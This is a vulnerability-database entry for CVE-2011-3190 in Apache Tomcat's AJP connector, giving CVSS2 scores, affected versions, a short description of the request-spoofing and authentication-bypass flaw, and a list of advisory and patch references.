CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
AI Score
Confidence
Low
EPSS
Percentile
85.4%
Certain AJP protocol connector implementations in Apache Tomcat 7.0.0 through 7.0.20, 6.0.0 through 6.0.33, 5.5.0 through 5.5.33, and possibly other versions allow remote attackers to spoof AJP requests, bypass authentication, and obtain sensitive information by causing the connector to interpret a request body as a new request.
Vendor | Product | Version | CPE |
---|---|---|---|
org.apache.tomcat | tomcat | * | cpe:2.3:a:org.apache.tomcat:tomcat:*:*:*:*:*:*:*:* |
marc.info/?l=bugtraq&m=132215163318824&w=2
marc.info/?l=bugtraq&m=133469267822771&w=2
marc.info/?l=bugtraq&m=136485229118404&w=2
marc.info/?l=bugtraq&m=139344343412337&w=2
securityreason.com/securityalert/8362
www.debian.org/security/2012/dsa-2401
www.mandriva.com/security/advisories?name=MDVSA-2011:156
exchange.xforce.ibmcloud.com/vulnerabilities/69472
github.com/advisories/GHSA-c38m-v4m2-524v
github.com/apache/tomcat/commit/a2538ce78f83b7376c48d12d8247600079d789b1
github.com/apache/tomcat55/commit/be3eb28f82250a5c81a1c42216570ebf892aefac
issues.apache.org/bugzilla/show_bug.cgi?id=51698
lists.apache.org/thread.html/06cfb634bc7bf37af7d8f760f118018746ad8efbd519c4b789ac9c2e@%3Cdev.tomcat.apache.org%3E
lists.apache.org/thread.html/8dcaf7c3894d66cb717646ea1504ea6e300021c85bb4e677dc16b1aa@%3Cdev.tomcat.apache.org%3E
lists.apache.org/thread.html/r3aacc40356defc3f248aa504b1e48e819dd0471a0a83349080c6bcbf@%3Cdev.tomcat.apache.org%3E
lists.apache.org/thread.html/r584a714f141eff7b1c358d4679288177bd4ca4558e9999d15867d4b5@%3Cdev.tomcat.apache.org%3E
nvd.nist.gov/vuln/detail/CVE-2011-3190
oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A14933
oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A19465
web.archive.org/web/20130121232525/www.securityfocus.com/archive/1/519466/100/0/threaded
web.archive.org/web/20130314002148/www.securityfocus.com/bid/49353
web.archive.org/web/20131214094052/www.securitytracker.com/id?1025993